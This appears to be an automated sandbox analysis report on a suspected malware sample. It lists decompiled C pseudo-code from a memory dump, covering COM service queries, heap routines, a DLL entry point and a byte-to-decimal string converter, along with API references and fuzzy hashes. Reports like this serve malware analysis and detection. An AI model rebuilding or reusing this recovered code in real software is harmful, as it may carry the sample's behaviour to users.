                                                                                  					_t53 = _v20;
                                                                                  					_push( &_v12);
                                                                                  					_push(1);
                                                                                  					_push( &_v32);
                                                                                  					_push(8);
                                                                                  					_t97 =  &_v48;
                                                                                  					_push(_t97);
                                                                                  					_push(_t97);
                                                                                  					_push(_t53); // executed
                                                                                  					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                                                                                  						_t56 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t30 = _t56 + 0x33fe428; // 0x5f289d0
                                                                                  						_t31 = _t56 + 0x33fe458; // 0x4c96be40
                                                                                  						_t58 =  *0x33fd0f8(_v12, _t31, _t30,  &_v24); // executed
                                                                                  						_t105 = _t58;
                                                                                  						_t59 = _v12;
                                                                                  						 *((intOrPtr*)( *_t59 + 8))(_t59);
                                                                                  						goto L11;
                                                                                  					} else {
                                                                                  						_t71 = _v20;
                                                                                  						_v16 = 0;
                                                                                  						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                                                                                  						if(_t105 >= 0) {
                                                                                  							_t111 = _v16;
                                                                                  							if(_t111 == 0) {
                                                                                  								_t105 = 0x80004005;
                                                                                  								goto L11;
                                                                                  							} else {
                                                                                  								if(_t111 <= 0) {
                                                                                  									L11:
                                                                                  									if(_t105 >= 0) {
                                                                                  										goto L12;
                                                                                  									}
                                                                                  								} else {
                                                                                  									do {
                                                                                  										_t73 = _v20;
                                                                                  										_v48 = 3;
                                                                                  										_v40 = _t81;
                                                                                  										_t107 = _t107 - 0x10;
                                                                                  										asm("movsd");
                                                                                  										asm("movsd");
                                                                                  										asm("movsd");
                                                                                  										asm("movsd");
                                                                                  										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                                                                                  										if(_t105 < 0) {
                                                                                  											goto L7;
                                                                                  										} else {
                                                                                  											_t76 =  *0x33fd230; // 0x2b2a5a8
                                                                                  											_t23 = _t76 + 0x33fe428; // 0x5f289d0
                                                                                  											_t24 = _t76 + 0x33fe458; // 0x4c96be40
                                                                                  											_t105 =  *0x33fd0f8(_v12, _t24, _t23,  &_v24);
                                                                                  											_t79 = _v12;
                                                                                  											 *((intOrPtr*)( *_t79 + 8))(_t79);
                                                                                  											if(_t105 >= 0) {
                                                                                  												L12:
                                                                                  												_t63 = _v24;
                                                                                  												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                                                                                  												if(_t105 >= 0) {
                                                                                  													_t99 =  *0x33fd230; // 0x2b2a5a8
                                                                                  													_t67 = _v28;
                                                                                  													_t40 = _t99 + 0x33fe418; // 0x214e3
                                                                                  													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                                                                                  													_t69 = _v28;
                                                                                  													 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                                                  												}
                                                                                  												_t65 = _v24;
                                                                                  												 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                  											} else {
                                                                                  												goto L7;
                                                                                  											}
                                                                                  										}
                                                                                  										goto L15;
                                                                                  										L7:
                                                                                  										_t81 = _t81 + 1;
                                                                                  									} while (_t81 < _v16);
                                                                                  									goto L11;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					L15:
                                                                                  					_t61 = _v20;
                                                                                  					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                                                  				}
                                                                                  				return _t105;
                                                                                  			}


































                                                                                  APIs
                                                                                  • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,05F289D0,033F841C,?,?,?,?,?,?,?,?,?,?,?,033F841C), ref: 033F4B8D
                                                                                  • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,05F289D0,033F841C,?,?,?,?,?,?,?,033F841C,00000000,00000000,00000000,006D0063), ref: 033F4BCB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: QueryServiceUnknown_
                                                                                  • String ID:
                                                                                  • API String ID: 2042360610-0
                                                                                  • Opcode ID: 6d1a38eccf4c856d28e8bb8db932249dccfe3ce4efd291f2d3b983959599b92e
                                                                                  • Instruction ID: ffb98bbe54b6c76946820fa0c9f4463bd79447531d57a9f7a99ad017ff5d0790
                                                                                  • Opcode Fuzzy Hash: 6d1a38eccf4c856d28e8bb8db932249dccfe3ce4efd291f2d3b983959599b92e
                                                                                  • Instruction Fuzzy Hash: 76513D75D00219AFCB00DFE9C8C8DAEB7B9FF48310B444598EA05EB255D731AD42CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 75%
                                                                                  			E033F75D9(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                  				void* _v8;
                                                                                  				void* __esi;
                                                                                  				intOrPtr* _t35;
                                                                                  				void* _t40;
                                                                                  				intOrPtr* _t41;
                                                                                  				intOrPtr* _t43;
                                                                                  				intOrPtr* _t45;
                                                                                  				intOrPtr* _t50;
                                                                                  				intOrPtr* _t52;
                                                                                  				void* _t54;
                                                                                  				intOrPtr* _t55;
                                                                                  				intOrPtr* _t57;
                                                                                  				intOrPtr* _t61;
                                                                                  				intOrPtr* _t65;
                                                                                  				intOrPtr _t68;
                                                                                  				void* _t72;
                                                                                  				void* _t75;
                                                                                  				void* _t76;
                                                                                  
                                                                                  				_t55 = _a4;
                                                                                  				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                  				_a4 = 0;
                                                                                  				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                  				if(_t76 < 0) {
                                                                                  					L18:
                                                                                  					return _t76;
                                                                                  				}
                                                                                  				_t40 = E033F8861(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                  				_t76 = _t40;
                                                                                  				if(_t76 >= 0) {
                                                                                  					_t61 = _a28;
                                                                                  					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                  						_t52 = _v8;
                                                                                  						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                  					}
                                                                                  					if(_t76 >= 0) {
                                                                                  						_t43 =  *_t55;
                                                                                  						_t68 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t20 = _t68 + 0x33fe1fc; // 0x740053
                                                                                  						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                  						if(_t76 >= 0) {
                                                                                  							_t76 = E033F1143(_a4);
                                                                                  							if(_t76 >= 0) {
                                                                                  								_t65 = _a28;
                                                                                  								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                  									_t50 = _a4;
                                                                                  									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t45 = _a4;
                                                                                  						if(_t45 != 0) {
                                                                                  							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                  						}
                                                                                  						_t57 = __imp__#6;
                                                                                  						if(_a20 != 0) {
                                                                                  							 *_t57(_a20);
                                                                                  						}
                                                                                  						if(_a12 != 0) {
                                                                                  							 *_t57(_a12);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				_t41 = _v8;
                                                                                  				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                  				goto L18;
                                                                                  			}






















                                                                                  APIs
                                                                                    • Part of subcall function 033F8861: SysAllocString.OLEAUT32(80000002), ref: 033F88B8
                                                                                    • Part of subcall function 033F8861: SysFreeString.OLEAUT32(00000000), ref: 033F891D
                                                                                  • SysFreeString.OLEAUT32(?), ref: 033F76B8
                                                                                  • SysFreeString.OLEAUT32(033FA412), ref: 033F76C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: String$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 986138563-0
                                                                                  • Opcode ID: 66b3baa5cce421c18e7aa94e224ef4d97267c9288cf334b25db927571be77ba7
                                                                                  • Instruction ID: 70064f99f0d35e108695a4d3cfcd39881e79a1865a7e1765344dfe8a937af8f5
                                                                                  • Opcode Fuzzy Hash: 66b3baa5cce421c18e7aa94e224ef4d97267c9288cf334b25db927571be77ba7
                                                                                  • Instruction Fuzzy Hash: 45314876900119AFCB11DF68CC88C9BBB79FFC97807544668F9159B210D331DD51CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 50%
                                                                                  			E033F7004(intOrPtr* __eax, intOrPtr _a4) {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				intOrPtr* _t22;
                                                                                  				void* _t23;
                                                                                  				intOrPtr* _t24;
                                                                                  				intOrPtr* _t26;
                                                                                  				intOrPtr* _t28;
                                                                                  				intOrPtr* _t30;
                                                                                  				void* _t31;
                                                                                  				intOrPtr* _t32;
                                                                                  				intOrPtr _t42;
                                                                                  				intOrPtr _t45;
                                                                                  				intOrPtr _t48;
                                                                                  				void* _t51;
                                                                                  
                                                                                  				_push( &_v16);
                                                                                  				_t42 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t2 = _t42 + 0x33fe468; // 0x20400
                                                                                  				_push(0);
                                                                                  				_push(__eax);
                                                                                  				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                                                                  				if(_t51 >= 0) {
                                                                                  					_t22 = _v16;
                                                                                  					_t45 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t6 = _t45 + 0x33fe488; // 0xe7a1af80
                                                                                  					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                                                                  					_t51 = _t23;
                                                                                  					if(_t51 >= 0) {
                                                                                  						_t26 = _v12;
                                                                                  						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                                                                  						if(_t51 >= 0) {
                                                                                  							_t48 =  *0x33fd230; // 0x2b2a5a8
                                                                                  							_t30 = _v8;
                                                                                  							_t12 = _t48 + 0x33fe478; // 0xa4c6892c
                                                                                  							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                                                                  							_t51 = _t31;
                                                                                  							_t32 = _v8;
                                                                                  							 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                  						}
                                                                                  						_t28 = _v12;
                                                                                  						 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                                                  					}
                                                                                  					_t24 = _v16;
                                                                                  					 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                  				}
                                                                                  				return _t51;
                                                                                  			}

                                                                                  APIs
                                                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 033F7041
                                                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 033F7072
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Interface_ProxyQueryUnknown_
                                                                                  • String ID:
                                                                                  • API String ID: 2522245112-0
                                                                                  • Opcode ID: 3de7b279bcdc30b377eb2017a39af46659f0172f07a6ebf93df2060b87d24a09
                                                                                  • Instruction ID: 362d1a2fe7d41c7b9d0ae985cedde58c684f2ff0bd06dc918df2bbec4d0f30d6
                                                                                  • Opcode Fuzzy Hash: 3de7b279bcdc30b377eb2017a39af46659f0172f07a6ebf93df2060b87d24a09
                                                                                  • Instruction Fuzzy Hash: 44212C75A0061AAFCB00DBA4C898D9AB779FF88704B548698ED05DB358D731EE41CBE0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SysAllocString.OLEAUT32(033F5886), ref: 033F9F6D
                                                                                    • Part of subcall function 033F75D9: SysFreeString.OLEAUT32(?), ref: 033F76B8
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F9FAD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: String$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 986138563-0
                                                                                  • Opcode ID: fab7c986fc2423cb88eaa1168a5c1ba6aba4d5843829564fdd7a7917d5d45d49
                                                                                  • Instruction ID: 35dafb90764badcff5e92308100adc7a062b02bd6d2546d11c7eba2fa0edfd7a
                                                                                  • Opcode Fuzzy Hash: fab7c986fc2423cb88eaa1168a5c1ba6aba4d5843829564fdd7a7917d5d45d49
                                                                                  • Instruction Fuzzy Hash: BB014F7651020EBFDB519F98C94899FBBB9EF44310B410121FE05A6160E774DA15CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                  				intOrPtr _t4;
                                                                                  				void* _t10;
                                                                                  				signed int _t11;
                                                                                  				void* _t13;
                                                                                  
                                                                                  				_t13 = 1;
                                                                                  				_t4 = _a8;
                                                                                  				if(_t4 == 0) {
                                                                                  					if(InterlockedDecrement( &E033FD1F4) == 0) {
                                                                                  						E033F310C();
                                                                                  					}
                                                                                  				} else {
                                                                                  					if(_t4 == 1 && InterlockedIncrement( &E033FD1F4) == 1) {
                                                                                  						_t10 = E033F8714(_t11, _a4); // executed
                                                                                  						if(_t10 != 0) {
                                                                                  							_t13 = 0;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t13;
                                                                                  			}

                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(033FD1F4), ref: 033FA5E6
                                                                                    • Part of subcall function 033F8714: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 033F8729
                                                                                  • InterlockedDecrement.KERNEL32(033FD1F4), ref: 033FA606
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                  • String ID:
                                                                                  • API String ID: 3834848776-0
                                                                                  • Opcode ID: fdb0160a1994e2f06559e444c154e2c9df1e238d7158b6ca04f18079feb83d9b
                                                                                  • Instruction ID: 2b0c9ed3b5692bc9176f46f0342560e9036c891782e579ff26fbb861ba41ed36
                                                                                  • Opcode Fuzzy Hash: fdb0160a1994e2f06559e444c154e2c9df1e238d7158b6ca04f18079feb83d9b
                                                                                  • Instruction Fuzzy Hash: E1E04F252842225FC665F6A58CCC76EFE5CAF00F88FC44164F789D9036D610C4918EA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 92%
                                                                                  			E033F8963(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                                                                  				signed int _v5;
                                                                                  				signed int _v12;
                                                                                  				void* _t32;
                                                                                  				signed int _t37;
                                                                                  				signed int _t39;
                                                                                  				signed char _t45;
                                                                                  				void* _t49;
                                                                                  				char* _t51;
                                                                                  				signed int _t65;
                                                                                  				signed int _t66;
                                                                                  				signed int _t69;
                                                                                  
                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                  				_t69 = __eax;
                                                                                  				_t32 = RtlAllocateHeap( *0x33fd1f0, 0, __eax << 2); // executed
                                                                                  				_t49 = _t32;
                                                                                  				if(_t49 == 0) {
                                                                                  					_v12 = 8;
                                                                                  				} else {
                                                                                  					 *_a8 = _t49;
                                                                                  					do {
                                                                                  						_t45 =  *_a4;
                                                                                  						asm("cdq");
                                                                                  						_t65 = 0x64;
                                                                                  						_t37 = (_t45 & 0x000000ff) / _t65;
                                                                                  						_v5 = _t37;
                                                                                  						if(_t37 != 0) {
                                                                                  							 *_t49 = _t37 + 0x30;
                                                                                  							_t49 = _t49 + 1;
                                                                                  							_t45 = _t45 + _t37 * 0x9c;
                                                                                  						}
                                                                                  						asm("cdq");
                                                                                  						_t66 = 0xa;
                                                                                  						_t39 = (_t45 & 0x000000ff) / _t66;
                                                                                  						if(_t39 != 0 || _v5 != _t39) {
                                                                                  							 *_t49 = _t39 + 0x30;
                                                                                  							_t49 = _t49 + 1;
                                                                                  							_t45 = _t45 + _t39 * 0xf6;
                                                                                  						}
                                                                                  						_a4 = _a4 + 1;
                                                                                  						 *_t49 = _t45 + 0x30;
                                                                                  						 *(_t49 + 1) = 0x2c;
                                                                                  						_t49 = _t49 + 2;
                                                                                  						_t69 = _t69 - 1;
                                                                                  					} while (_t69 != 0);
                                                                                  					_t51 = _t49 - 1;
                                                                                  					 *_a12 = _t51 -  *_a8;
                                                                                  					 *_t51 = 0;
                                                                                  				}
                                                                                  				return _v12;
                                                                                  			}

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 033F897B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 6d9bb09ba5309e05f62ab59e2916bfeae1138f5c86c8e85df4f3f13921bd4b1a
                                                                                  • Instruction ID: 84bc1b7e21d76399f5c181403f525f6e66ad3b958bcf0dd099d42f307a19b247
                                                                                  • Opcode Fuzzy Hash: 6d9bb09ba5309e05f62ab59e2916bfeae1138f5c86c8e85df4f3f13921bd4b1a
                                                                                  • Instruction Fuzzy Hash: 7A1129312853459FEB09CF2DC891BEABBA9DB53318F58408EE5808F392C277850BC760
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 34%
                                                                                  			E033F3160(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                  				intOrPtr _v12;
                                                                                  				void* _v18;
                                                                                  				short _v20;
                                                                                  				intOrPtr _t15;
                                                                                  				short _t17;
                                                                                  				intOrPtr _t19;
                                                                                  				short _t23;
                                                                                  
                                                                                  				_t23 = 0;
                                                                                  				_v20 = 0;
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				asm("stosw");
                                                                                  				_t15 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t4 = _t15 + 0x33fe394; // 0x5f2893c
                                                                                  				_t20 = _t4;
                                                                                  				_t6 = _t15 + 0x33fe124; // 0x650047
                                                                                  				_t17 = E033F75D9(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                  				if(_t17 < 0) {
                                                                                  					_t23 = _t17;
                                                                                  				} else {
                                                                                  					if(_v20 != 8) {
                                                                                  						_t23 = 1;
                                                                                  					} else {
                                                                                  						_t19 = E033F7404(_t20, _v12);
                                                                                  						if(_t19 == 0) {
                                                                                  							_t23 = 8;
                                                                                  						} else {
                                                                                  							 *_a16 = _t19;
                                                                                  						}
                                                                                  						__imp__#6(_v12);
                                                                                  					}
                                                                                  				}
                                                                                  				return _t23;
                                                                                  			}











                                                                                  APIs
                                                                                    • Part of subcall function 033F75D9: SysFreeString.OLEAUT32(?), ref: 033F76B8
                                                                                    • Part of subcall function 033F7404: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,033F76F9,004F0053,00000000,?), ref: 033F740D
                                                                                    • Part of subcall function 033F7404: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,033F76F9,004F0053,00000000,?), ref: 033F7437
                                                                                    • Part of subcall function 033F7404: memset.NTDLL ref: 033F744B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F31C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 397948122-0
                                                                                  • Opcode ID: 5d9c82e3b99d2910f6bf936a10ddb9f6f921306d3ce4ee2ff2d9f2bb16ceda16
                                                                                  • Instruction ID: e2a0b2e789f7a77c92b7f4bb78a1db3351ace34c73cda7b9ccd7e0951579beed
                                                                                  • Opcode Fuzzy Hash: 5d9c82e3b99d2910f6bf936a10ddb9f6f921306d3ce4ee2ff2d9f2bb16ceda16
                                                                                  • Instruction Fuzzy Hash: 96015E36500119BFDB11FF98CC85DAEBBB9FB05760F800965EA01E7060E3709951C7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E033F726B(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                                                                                  				char _v8;
                                                                                  				void* _t14;
                                                                                  				intOrPtr _t17;
                                                                                  				void* _t20;
                                                                                  				void* _t26;
                                                                                  
                                                                                  				_push(__ecx);
                                                                                  				if(_a4 == 0 || __eax == 0) {
                                                                                  					_t26 = 0x57;
                                                                                  				} else {
                                                                                  					_t14 = E033F8963(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                                                                                  					_t26 = _t14;
                                                                                  					if(_t26 == 0) {
                                                                                  						_t17 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t9 = _t17 + 0x33fea08; // 0x444f4340
                                                                                  						_t20 = E033F1650( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                                                                                  						_t26 = _t20;
                                                                                  						RtlFreeHeap( *0x33fd1f0, 0, _a4); // executed
                                                                                  					}
                                                                                  				}
                                                                                  				return _t26;
                                                                                  			}









                                                                                  APIs
                                                                                    • Part of subcall function 033F8963: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 033F897B
                                                                                    • Part of subcall function 033F1650: lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 033F1684
                                                                                    • Part of subcall function 033F1650: StrStrA.SHLWAPI(00000000,?), ref: 033F1691
                                                                                    • Part of subcall function 033F1650: RtlAllocateHeap.NTDLL(00000000,?), ref: 033F16B0
                                                                                    • Part of subcall function 033F1650: memcpy.NTDLL(00000000,0000000B,0000000B), ref: 033F16C4
                                                                                    • Part of subcall function 033F1650: memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 033F16D3
                                                                                    • Part of subcall function 033F1650: memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 033F16EE
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,033F8A8E), ref: 033F72C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Heapmemcpy$Allocate$Freelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 4098479933-0
                                                                                  • Opcode ID: 97ebbca6fe7e27d86a2d8b277a8c8aeb2a1b384360b7e5b19bb456ff480413c9
                                                                                  • Instruction ID: 38c8c1fc6783f3e489317ccf5041242ddafb97bf2474679adcc911b166669c95
                                                                                  • Opcode Fuzzy Hash: 97ebbca6fe7e27d86a2d8b277a8c8aeb2a1b384360b7e5b19bb456ff480413c9
                                                                                  • Instruction Fuzzy Hash: 1A01F436100109FFCB11DF08CC80FAABBBDEB54390F544129FB458A164E732EA44DB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F75C4(long _a4) {
                                                                                  				void* _t2;
                                                                                  
                                                                                  				_t2 = RtlAllocateHeap( *0x33fd1f0, 0, _a4); // executed
                                                                                  				return _t2;
                                                                                  			}




                                                                                  0x033f75d0
                                                                                  0x033f75d6

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: a0f6df96fce7d48d51dd9a490eb8ddb03d6c65a4ca52887d6a66224b45244b4e
                                                                                  • Instruction ID: b6d5bd25f59c459a9ccac8957f8bea067cdbe4fa7dd3d456cbb0eaeb314708bb
                                                                                  • Opcode Fuzzy Hash: a0f6df96fce7d48d51dd9a490eb8ddb03d6c65a4ca52887d6a66224b45244b4e
                                                                                  • Instruction Fuzzy Hash: B0B01231440101FFDA017B10DD48F057B25F754700F408010F2000406CC2314420FB14
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F4C31(void* _a4) {
                                                                                  				char _t2;
                                                                                  
                                                                                  				_t2 = RtlFreeHeap( *0x33fd1f0, 0, _a4); // executed
                                                                                  				return _t2;
                                                                                  			}




                                                                                  0x033f4c3d
                                                                                  0x033f4c43

                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 9b52ed4c010d64943d7341dbb9bfc7a919d88bb76c86dba9647a3e37cd689d3d
